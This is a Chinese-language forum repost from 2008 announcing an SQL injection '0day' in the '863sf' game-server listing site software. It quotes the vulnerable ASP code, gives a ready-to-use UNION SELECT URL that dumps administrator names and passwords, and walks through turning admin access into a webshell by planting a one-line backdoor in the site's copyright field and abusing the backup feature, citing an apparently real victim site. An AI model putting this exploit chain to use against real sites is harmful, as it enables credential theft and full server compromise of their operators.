863sf发布站sql inject 0day

| |
[不指定 10/12/2008 15:37 | by 樱花浪子 ]
来源:http://www.t00ls.net

做安全检测的碰到了这个程序,去官方程序居然要购买才给下载,机缘巧合我CAIN居然嗅到一个这样的程序后台,成功获取了SHELL,我就把程序打包下来研究了下,分享给大家。

jzvote.asp
复制内容到剪贴板
代码:
Dim SS, Limit, No_Ok, IP, id
  Set conn=Server.CreateObject("ADODB.Connection")
  conn.open ConnStr
  IF Request.Form("IsSub")="YES" THEN
    SS=Request.Form("SS")  '家族序号
    Set rs=conn.execute("Select Limit From Gq_Jzdata Where ID="&SS)
Limit=Cint(rs(0))
    rs.close
    No_Ok=False
    IF Limit=1 THEN
      IF Request.Cookies("Gq_No_"&SS)="DONE" THEN
        No_Ok=True
从表单获取参数没有过滤,可惜没有返回结果,别急在继续往下看。



More.asp
复制内容到剪贴板
代码:
menu=request("menu")
if menu<>"" then
Set Rs_type = Server.CreateObject("ADODB.RecordSet")
Sql_Type="select Game from Gq_GameType where ID = " & Menu
Rs_type.open Sql_type,conn,1,1
If Rs_type.eof and Rs_type.bof then
start="最新天龙八部私服"
Else
start="最新" & Rs_type("Game")
End If
很明显也是参数没过滤,调用了rs可以返回结果。



exp:
复制内容到剪贴板
代码:
http://localhost/more.asp?menu=1%20and%201=2%20union%20select%20Adminname%20%26%27|%27%26password%20from%20Gq_admin
我实例演示下,这套程序默认后台adminll/login.asp,不过好像默认的不多,如果你有办法获取后台PM我。

点击在新窗口中浏览此图片

点击在新窗口中浏览此图片

风云私服  tao129

我这里说一下后台怎么获取SHELL,虽然后备份功能,但是没有上传,这个难不倒我们,哈哈。

在网站版权信息这里,插入一句话.

点击在新窗口中浏览此图片


编辑好了,选择生成其他HTML页

点击在新窗口中浏览此图片

去前台对应文件看看,
http://www.hao187.com/help.html

点击在新窗口中浏览此图片

我们来备份吧,

点击在新窗口中浏览此图片

点击在新窗口中浏览此图片
★★[转载文档]★★ | 评论(0) | 引用(0) | 阅读(201)